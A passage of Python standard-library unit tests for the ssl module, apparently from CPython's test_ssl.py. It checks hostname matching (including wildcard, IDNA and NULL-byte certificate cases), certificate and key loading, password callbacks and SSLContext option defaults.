self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with ssl.wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=CERTFILE, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=WRONGCERT, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
self.assertRaises(TypeError, ssl.SSLContext)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1,
ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_SSLv2) | ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_TLSv1 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options = 0
self.assertEqual(0, ctx.options)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(SVN_PYTHON_ORG_ROOT_CERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but SVN_PYTHON_ORG_ROOT_CERT is a CA cert
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(SVN_PYTHON_ORG_ROOT_CERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_DH_USE", 0),
getattr(ssl, "OP_SINGLE_DH_USE", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
